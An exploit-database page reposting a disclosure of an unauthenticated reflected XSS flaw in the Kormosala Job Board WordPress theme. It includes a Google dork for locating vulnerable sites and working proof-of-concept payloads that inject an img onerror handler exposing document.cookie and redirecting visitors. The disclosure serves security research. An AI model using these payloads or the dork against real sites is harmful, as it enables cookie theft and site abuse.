Advertisement






Kormosala – Job Board WordPress Theme v1.0.22 - Unauthenticated Reflected XSS

CVE Category Price Severity
CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-07-13
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070062

Below is a copy:

Kormosala Job Board WordPress Theme v1.0.22 - Unauthenticated Reflected XSS
[+] Exploit Title: Kormosala  Job Board WordPress Theme v1.0.22 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/kormosala/
[+] Date: 2020-06-17
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: ApusTheme [ https://themeforest.net/user/apustheme ]
[+] Software Version: 1.0.22
[+] Software Link: https://themeforest.net/item/kormosala-job-board-wordpress-theme/24756609
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Kormosala Job Board theme through 1.0.22 for WordPress.



### [ PoC: ]

[!] https://apusthemes.com/wp-demo/kormosala/jobs/?filter-title=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&filter-center-location=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain);window.location=`https://twitter.com/vlad_vector`;%3E

[!] GET /wp-demo/kormosala/jobs/?filter-title=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&filter-center-location=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain);window.location=`https://twitter.com/vlad_vector`;%3E HTTP/1.1
Host: apusthemes.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum